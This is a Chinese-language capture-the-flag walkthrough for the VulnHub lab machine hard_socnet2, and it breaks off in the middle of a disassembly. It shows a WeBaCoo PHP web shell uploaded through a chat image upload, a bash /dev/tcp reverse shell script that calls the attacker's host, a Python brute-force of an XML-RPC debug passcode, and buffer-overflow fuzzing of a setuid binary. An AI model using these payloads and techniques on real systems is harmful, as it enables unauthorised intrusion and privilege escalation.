靶机: hard_socnet2
靶机: hard_socnet2
准备
-
靶机:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
-
MD5 验证: 9d6bed141a97452fcb8ca2921207c24e
- cmd 进行校验:
certutil -hashfile 文件路径 MD5 - powershell 进行校验:
Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- cmd 进行校验:
-
使用 VirtualBox
-
网络 Host-Only
-
-
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
攻略
发现目标
使用 arp-scan 结合 nmap 进行
-
使用
sudo arp-scan -l -I eth1发现目标 IP : 192.168.56.114┌──(kali㉿kali)-[~] └─$ sudo arp-scan -l -I eth1 Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111 Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered) 192.168.56.100 08:00:27:d3:0c:de PCS Systemtechnik GmbH 192.168.56.114 08:00:27:c4:b2:37 PCS Systemtechnik GmbH- 192.168.56.1 是网关
- 192.168.56.100 是 DHCP 服务器
-
使用
nmap -A -T4 192.168.56.114简单扫描一番,发现三个开发端口┌──(kali㉿kali)-[~] └─$ nmap -A -T4 192.168.56.114 Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-06 13:15 CST Nmap scan report for 192.168.56.114 Host is up (0.0014s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5d34e54fe663ef3b2a54b519f5ff9c6 (RSA) | 256 de86ef769363748300b1a3b8c24c8f58 (ECDSA) |_ 256 b5ecf11e9a5a5cd7023a9e1bf7c8b453 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Social Network 8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1) |_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1 |_xmlrpc-methods: XMLRPC instance doesn't support introspection. |_http-title: Error response Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds-
22/tcp是 SSH 服务,应用版本是 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) -
80/tcp是 http 服务,使用 Apache/2.4.29 (Ubuntu) -
8000/tcp是 http 服务,使用 BaseHTTPServer 0.3 (Python 2.7.15rc1)- BaseHTTPServer 是 HTTP 服务器这个模块定义了两个实现 HTTP 服务器的类
- 根据扫描结果这个端口并不能很好访问
-
初步攻击
根据扫描结果,80/tcp 更容易成为突破口,使用 firefox 访问 http://192.168.56.114:80/ 是一个登录界面
<!DOCTYPE html>
<html>
<head>
<title>Social Network</title>
<link rel="stylesheet" type="text/css" href="resources/css/main.css">
<style>
.container{
margin: 40px auto;
width: 400px;
}
.content {
padding: 30px;
background-color: white;
box-shadow: 0 0 5px #4267b2;
}
</style>
</head>
<body>
<h1>Welcome to Pynch</h1>
<div class="container">
<div class="tab">
<button class="tablink active" onclick="openTab(event,'signin')" id="link1">Login</button>
<button class="tablink" onclick="openTab(event,'signup')" id="link2">Sign Up</button>
</div>
<div class="content">
<div class="tabcontent" id="signin">
<form method="post" onsubmit="return validateLogin()">
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="loginuseremail">
<div class="required"></div>
<br>
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="loginuserpass">
<div class="required"></div>
<br><br>
<input type="submit" value="Login" name="login">
</form>
</div>
<div class="tabcontent" id="signup">
<form method="post" onsubmit="return validateRegister()">
<!--Package One-->
<h2>Highly Required Information</h2>
<hr>
<!--First Name-->
<label>First Name<span>*</span></label><br>
<input type="text" name="userfirstname" id="userfirstname">
<div class="required"></div>
<br>
<!--Last Name-->
<label>Last Name<span>*</span></label><br>
<input type="text" name="userlastname" id="userlastname">
<div class="required"></div>
<br>
<!--Nickname-->
<label>Nickname</label><br>
<input type="text" name="usernickname" id="usernickname">
<div class="required"></div>
<br>
<!--Password-->
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="userpass">
<div class="required"></div>
<br>
<!--Confirm Password-->
<label>Confirm Password<span>*</span></label><br>
<input type="password" name="userpassconfirm" id="userpassconfirm">
<div class="required"></div>
<br>
<!--Email-->
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="useremail">
<div class="required"></div>
<br>
<!--Birth Date-->
Birth Date<span>*</span><br>
<select name="selectday">
<option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option> </select>
<select name="selectmonth">
<option value="1">January</option><option value="2">February</option><option value="3">March</option><option value="4">April</option><option value="5">May</option><option value="6">June</option><option value="7">July</option><option value="8">August</option><option value="9">September</option><option value="10">October</option><option value="11">Novemeber</option><option value="12">December</option> </select>
<select name="selectyear">
<option value="2017">2017</option><option value="2016">2016</option><option value="2015">2015</option><option value="2014">2014</option><option value="2013">2013</option><option value="2012">2012</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996" selected>1996</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option><option value="1904">1904</option><option value="1903">1903</option><option value="1902">1902</option><option value="1901">1901</option><option value="1900">1900</option> </select>
<br><br>
<!--Gender-->
<input type="radio" name="usergender" value="M" id="malegender" class="usergender">
<label>Male</label>
<input type="radio" name="usergender" value="F" id="femalegender" class="usergender">
<label>Female</label>
<div class="required"></div>
<br>
<!--Hometown-->
<label>Hometown</label><br>
<input type="text" name="userhometown" id="userhometown">
<br>
<!--Package Two-->
<h2>Additional Information</h2>
<hr>
<!--Marital Status-->
<input type="radio" name="userstatus" value="S" id="singlestatus">
<label>Single</label>
<input type="radio" name="userstatus" value="E" id="engagedstatus">
<label>Engaged</label>
<input type="radio" name="userstatus" value="M" id="marriedstatus">
<label>Married</label>
<br><br>
<!--About Me-->
<label>About Me</label><br>
<textarea rows="12" name="userabout" id="userabout"></textarea>
<br><br>
<input type="submit" value="Create Account" name="register">
</form>
</div>
</div>
</div>
<script src="resources/js/main.js"></script>
</body>
</html>
-
分析表单,分析登录并没有什么特别好的方法,我们可以尝试注册一个账号登录
-
登录后的界面,在聊天区有 admin 账号的信息
Hello friends! I have been working on a new script for monitoring servers. It is called monitor.py. I am running it on this server. I will release it soon!
我们可以在聊天群上传图片,我们使用 webacoo 进行入侵
- 制作木马:
webacoo -g -o exp.php - 在聊天处上传文件
exp.php发一条留言,并复制上传图片位置 - 执行
webacoo -t -u http://192.168.56.114/data/images/posts/11.php
┌──(kali㉿kali)-[~/workspace]
└─$ webacoo -t -u http://192.168.56.114/data/images/posts/11.php
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.
webacoo$ ls
10.php
11.php
4.png
5.png
6.png
-
查看版本内核
webacoo$ uname -a Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
此处可以使用 CVE-2021-3493 漏洞直接进行攻破,但我们不使用
更好的维持 shell
我们分享当前的 shell 能力有限,我们需要封装一个木马
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.111/4444 0>&1
- 上传此木马,通过聊天区或 python3 挂服务上传,使用 webacoo 的 shell 赋予上传的新木马可以执行权限
- Kali 挂监听 4444 然后 webacoo 的 shell 执行上传脚本
再次提升
- 在新的 shell 中执行
python -c "import pty; pty.spawn('/bin/bash')"再次提升交互性
提权 www-data
信息收集
-
查看
cat /etc/passwdwww-data@socnet2:/var/www/html/data/images/posts$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin socnet:x:1000:1000:socnet2:/home/socnet:/bin/bash mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false- 发现用户 socnet
-
我们去验证
/home/socnet并探查www-data@socnet2:/var/www/html/data/images/posts$ cd /home/socnet cd /home/socnet www-data@socnet2:/home/socnet$ ls -alh ls -alh total 60K drwxr-xr-x 6 socnet socnet 4.0K Oct 29 2018 . drwxr-xr-x 3 root root 4.0K Oct 29 2018 .. -rw-r--r-- 1 socnet socnet 3.7K Apr 4 2018 .bashrc drwx------ 2 socnet socnet 4.0K Oct 29 2018 .cache -rw------- 1 socnet socnet 1.1K Oct 29 2018 .gdb_history -rw-rw-r-- 1 socnet socnet 22 Oct 29 2018 .gdbinit drwx------ 3 socnet socnet 4.0K Oct 29 2018 .gnupg drwxrwxr-x 3 socnet socnet 4.0K Oct 29 2018 .local -rw------- 1 socnet socnet 579 Oct 29 2018 .mysql_history -rw-r--r-- 1 socnet socnet 807 Apr 4 2018 .profile -rw-rw-r-- 1 socnet socnet 66 Oct 29 2018 .selected_editor -rw-r--r-- 1 socnet socnet 0 Oct 29 2018 .sudo_as_admin_successful -rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record -rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda- 注意 add_record 文件它权限中的
s的目前我权限动不了 - 注意 monitor.py 是前文聊天区中 admin 的所说的内容
- peda 是动态调试用的,我们大概可以猜测是需要反汇编
- 注意 add_record 文件它权限中的
-
查看 monitor.py
#my remote server management API import SimpleXMLRPCServer import subprocess import random debugging_pass = random.randint(1000,9999) def runcmd(cmd): results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) output = results.stdout.read() + results.stderr.read() return output def cpu(): return runcmd("cat /proc/cpuinfo") def mem(): return runcmd("free -m") def disk(): return runcmd("df -h") def net(): return runcmd("ip a") def secure_cmd(cmd,passcode): if passcode==debugging_pass: return runcmd(cmd) else: return "Wrong passcode." server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000)) server.register_function(cpu) server.register_function(mem) server.register_function(disk) server.register_function(net) server.register_function(secure_cmd) server.serve_forever()-
得知它是 admin 的 remote server management API (远程管理 API)
-
SimpleXMLRPCServer 调用的端口
8000开始的扫描端口记着吗? -
SimpleXMLRPCServer 资料
-
尝试通过 monitor.py 攻击
-
编写访问测试的脚本
import xmlrpc.client with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy: print(str(proxy.cpu()))- 测试成功
┌──(kali㉿kali)-[~] └─$ python3 client.py processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 122 model name : Intel(R) Celeron(R) J4125 CPU @ 2.00GHz stepping : 8 cpu MHz : 1996.797 cache size : 4096 KB physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 22 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave rdrand hypervisor lahf_lm 3dnowprefetch fsgsbase rdseed clflushopt arch_capabilities bugs : spectre_v1 spectre_v2 spec_store_bypass bogomips : 3993.59 clflush size : 64 cache_alignment : 64 address sizes : 39 bits physical, 48 bits virtual power management: -
调整
import xmlrpc.client with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy: for i in range(1000, 10000): if not "Wrong" in str(proxy.secure_cmd('whoami', i)): print(i) break结果
┌──(kali㉿kali)-[~] └─$ python3 client.py 4712
使用之前更好的维持 shell 的反弹 shell 木马完成新的反弹 shell
import xmlrpc.client
with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
str(proxy.secure_cmd('/var/www/html/data/images/posts/exp.sh', 4712))
-
结果提权为 socnet 用户
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 41584 bash: cannot set terminal process group (730): Inappropriate ioctl for device bash: no job control in this shell socnet@socnet2:~$ -
执行
python -c "import pty; pty.spawn('/bin/bash')"再次提升交互性
二次提权
现在我们已经提权为 socnet 用户,我们有权限动 add_record
socnet@socnet2:~$ ls -hl
ls -hl
total 16K
-rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record
-rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py
drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda
socnet@socnet2:~$ file add_record
file add_record
add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
- 通过执行 add_record 可以发现是一个添加职员信息的一个程序
- 程序是
ELF 32-bit动态链接/lib/ld-linux.so.2
在此我们使用 gdb 进行调试 add_record 命令 gdb -q ./add_record
```bash
socnet@socnet2:~$ gdb -q ./add_record
gdb -q ./add_record
Reading symbols from ./add_record...(no debugging symbols found)...done.
gdb-peda$
```
-
使用
r运行,通过过多的输入查看是否存在内存溢出漏洞gdb-peda$ r r Starting program: /home/socnet/add_record Welcome to Add Record application Use it to add info about Social Network 2.0 Employees Employee Name(char): aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Years worked(int): Salary(int): Ever got in trouble? 1 (yes) or 0 (no): Employee data you've entered: Name aaaaaaaaaaaaaaaaaaaaaaaa Years -136196023, Salary -8468, Trouble 8, Comments NA [Inferior 1 (process 17038) exited normally] Warning: not running or target is remote- Inferior 1 (process 17038) exited normally 说明没有内存溢出漏洞,反复试探剩下的注入点
-
内存溢出漏洞在注入点
Explain:处gdb-peda$ r r Starting program: /home/socnet/add_record Welcome to Add Record application Use it to add info about Social Network 2.0 Employees Employee Name(char): aa aa Years worked(int): 11 11 Salary(int): 1 1 Ever got in trouble? 1 (yes) or 0 (no): 1 1 Explain: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xffffdc1e ('a' <repeats 102 times>) EBX: 0x61616161 ('aaaa') ECX: 0xffffdce0 --> 0x6161 ('aa') EDX: 0xffffdc82 --> 0x61006161 ('aa') ESI: 0xf7fc2000 --> 0x1d4d6c EDI: 0xffffdce0 --> 0x6161 ('aa') EBP: 0x61616161 ('aaaa') ESP: 0xffffdc60 ('a' <repeats 36 times>) EIP: 0x61616161 ('aaaa') EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x61616161 [------------------------------------stack-------------------------------------] 0000| 0xffffdc60 ('a' <repeats 36 times>) 0004| 0xffffdc64 ('a' <repeats 32 times>) 0008| 0xffffdc68 ('a' <repeats 28 times>) 0012| 0xffffdc6c ('a' <repeats 24 times>) 0016| 0xffffdc70 ('a' <repeats 20 times>) 0020| 0xffffdc74 ('a' <repeats 16 times>) 0024| 0xffffdc78 ('a' <repeats 12 times>) 0028| 0xffffdc7c ("aaaaaaaa") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x61616161 in ?? ()- 重点关注
EIP寄存器状态
- 重点关注
-
使用
pattern create 100生成一个寄存器容量上限数据不重复的字符串,测试关键节点gdb-peda$ pattern create 100 pattern create 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r r Starting program: /home/socnet/add_record Welcome to Add Record application Use it to add info about Social Network 2.0 Employees Employee Name(char): aa aa Years worked(int): 111 111 Salary(int): 1 1 Ever got in trouble? 1 (yes) or 0 (no): 1 1 Explain: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xffffdc1e ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EBX: 0x63414147 ('GAAc') ECX: 0xffffdce0 --> 0x0 EDX: 0xffffdc82 --> 0x42414100 ('') ESI: 0xf7fc2000 --> 0x1d4d6c EDI: 0xffffdce0 --> 0x0 EBP: 0x41324141 ('AA2A') ESP: 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x41414841 ('AHAA') EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41414841 [------------------------------------stack-------------------------------------] 0000| 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0004| 0xffffdc64 ("AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0xffffdc68 ("AeAA4AAJAAfAA5AAKAAgAA6AAL") 0012| 0xffffdc6c ("4AAJAAfAA5AAKAAgAA6AAL") 0016| 0xffffdc70 ("AAfAA5AAKAAgAA6AAL") 0020| 0xffffdc74 ("A5AAKAAgAA6AAL") 0024| 0xffffdc78 ("KAAgAA6AAL") 0028| 0xffffdc7c ("AA6AAL") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41414841 in ?? ()- 在字符串中
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL查找 EIP 寄存器的AHAA - 使用 grep 确认位置
echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' | grep 'AHAA' - 关键长度
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAA通过最后四个字符串控制 EIP 寄存器
- 在字符串中
现在我们要确定需要注入的内容
-
使用
disas main查看汇编代码0x080486d8 <+0>: lea ecx,[esp+0x4] 0x080486dc <+4>: and esp,0xfffffff0 0x080486df <+7>: push DWORD PTR [ecx-0x4] 0x080486e2 <+10>: push ebp 0x080486e3 <+11>: mov ebp,esp 0x080486e5 <+13>: push edi 0x080486e6 <+14>: push esi 0x080486e7 <+15>: push ebx 0x080486e8 <+16>: push ecx 0x080486e9 <+17>: sub esp,0xa8 0x080486ef <+23>: call 0x80485b0 <__x86.get_pc_thunk.bx> 0x080486f4 <+28>: add ebx,0x1654 0x080486fa <+34>: mov DWORD PTR [ebp-0xac],0x414e 0x08048704 <+44>: lea edx,[ebp-0xa8] 0x0804870a <+50>: mov eax,0x0 0x0804870f <+55>: mov ecx,0x18 0x08048714 <+60>: mov edi,edx 0x08048716 <+62>: rep stos DWORD PTR es:[edi],eax 0x08048718 <+64>: sub esp,0x8 0x0804871b <+67>: lea eax,[ebx-0x13ee] 0x08048721 <+73>: push eax 0x08048722 <+74>: lea eax,[ebx-0x13ec] 0x08048728 <+80>: push eax 0x08048729 <+81>: call 0x8048520 <fopen@plt> 0x0804872e <+86>: add esp,0x10 0x08048731 <+89>: mov DWORD PTR [ebp-0x1c],eax 0x08048734 <+92>: sub esp,0xc 0x08048737 <+95>: lea eax,[ebx-0x13d4] 0x0804873d <+101>: push eax 0x0804873e <+102>: call 0x80484e0 <puts@plt> 0x08048743 <+107>: add esp,0x10 0x08048746 <+110>: sub esp,0xc 0x08048749 <+113>: lea eax,[ebx-0x137c] 0x0804874f <+119>: push eax 0x08048750 <+120>: call 0x8048480 <printf@plt> 0x08048755 <+125>: add esp,0x10 0x08048758 <+128>: mov eax,DWORD PTR [ebx-0x4] 0x0804875e <+134>: mov eax,DWORD PTR [eax] 0x08048760 <+136>: sub esp,0x4 0x08048763 <+139>: push eax 0x08048764 <+140>: push 0x19 0x08048766 <+142>: lea eax,[ebp-0x39] 0x08048769 <+145>: push eax 0x0804876a <+146>: call 0x80484b0 <fgets@plt> 0x0804876f <+151>: add esp,0x10 0x08048772 <+154>: sub esp,0xc 0x08048775 <+157>: lea eax,[ebx-0x1366] 0x0804877b <+163>: push eax 0x0804877c <+164>: call 0x8048480 <printf@plt> 0x08048781 <+169>: add esp,0x10 0x08048784 <+172>: sub esp,0x8 0x08048787 <+175>: lea eax,[ebp-0x40] 0x0804878a <+178>: push eax 0x0804878b <+179>: lea eax,[ebx-0x1352] 0x08048791 <+185>: push eax 0x08048792 <+186>: call 0x8048540 <__isoc99_scanf@plt> 0x08048797 <+191>: add esp,0x10 0x0804879a <+194>: sub esp,0xc 0x0804879d <+197>: lea eax,[ebx-0x134f] 0x080487a3 <+203>: push eax 0x080487a4 <+204>: call 0x8048480 <printf@plt> 0x080487a9 <+209>: add esp,0x10 0x080487ac <+212>: sub esp,0x8 0x080487af <+215>: lea eax,[ebp-0x44] 0x080487b2 <+218>: push eax 0x080487b3 <+219>: lea eax,[ebx-0x1352] 0x080487b9 <+225>: push eax 0x080487ba <+226>: call 0x8048540 <__isoc99_scanf@plt> 0x080487bf <+231>: add esp,0x10 0x080487c2 <+234>: sub esp,0xc 0x080487c5 <+237>: lea eax,[ebx-0x1340] 0x080487cb <+243>: push eax 0x080487cc <+244>: call 0x8048480 <printf@plt> 0x080487d1 <+249>: add esp,0x10 0x080487d4 <+252>: sub esp,0x8 0x080487d7 <+255>: lea eax,[ebp-0x48] 0x080487da <+258>: push eax 0x080487db <+259>: lea eax,[ebx-0x1352] 0x080487e1 <+265>: push eax 0x080487e2 <+266>: call 0x8048540 <__isoc99_scanf@plt> 0x080487e7 <+271>: add esp,0x10 0x080487ea <+274>: call 0x80484a0 <getchar@plt> 0x080487ef <+279>: mov DWORD PTR [ebp-0x20],eax 0x080487f2 <+282>: cmp DWORD PTR [ebp-0x20],0xa 0x080487f6 <+286>: je 0x80487fe <main+294> 0x080487f8 <+288>: cmp DWORD PTR [ebp-0x20],0xffffffff 0x080487fc <+292>: jne 0x80487ea <main+274> 0x080487fe <+294>: mov eax,DWORD PTR [ebp-0x48] 0x08048801 <+297>: cmp eax,0x1 0x08048804 <+300>: jne 0x804883c <main+356> 0x08048806 <+302>: sub esp,0xc 0x08048809 <+305>: lea eax,[ebx-0x1317] 0x0804880f <+311>: push eax 0x08048810 <+312>: call 0x8048480 <printf@plt> 0x08048815 <+317>: add esp,0x10 0x08048818 <+320>: sub esp,0xc 0x0804881b <+323>: lea eax,[ebp-0xac] 0x08048821 <+329>: push eax 0x08048822 <+330>: call 0x8048490 <gets@plt> 0x08048827 <+335>: add esp,0x10 0x0804882a <+338>: sub esp,0xc 0x0804882d <+341>: lea eax,[ebp-0xac] 0x08048833 <+347>: push eax 0x08048834 <+348>: call 0x80486ad <vuln> 0x08048839 <+353>: add esp,0x10 0x0804883c <+356>: sub esp,0xc 0x0804883f <+359>: lea eax,[ebx-0x130d] 0x08048845 <+365>: push eax 0x08048846 <+366>: call 0x80484e0 <puts@plt> 0x0804884b <+371>: add esp,0x10 0x0804884e <+374>: mov ecx,DWORD PTR [ebp-0x48] 0x08048851 <+377>: mov edx,DWORD PTR [ebp-0x44] 0x08048854 <+380>: mov eax,DWORD PTR [ebp-0x40] 0x08048857 <+383>: sub esp,0x8 0x0804885a <+386>: lea esi,[ebp-0xac] 0x08048860 <+392>: push esi 0x08048861 <+393>: push ecx 0x08048862 <+394>: push edx 0x08048863 <+395>: push eax 0x08048864 <+396>: lea eax,[ebp-0x39] 0x08048867 <+399>: push eax 0x08048868 <+400>: lea eax,[ebx-0x12ec] 0x0804886e <+406>: push eax 0x0804886f <+407>: call 0x8048480 <printf@plt> 0x08048874 <+412>: add esp,0x20 0x08048877 <+415>: mov ecx,DWORD PTR [ebp-0x48] 0x0804887a <+418>: mov edx,DWORD PTR [ebp-0x44] 0x0804887d <+421>: 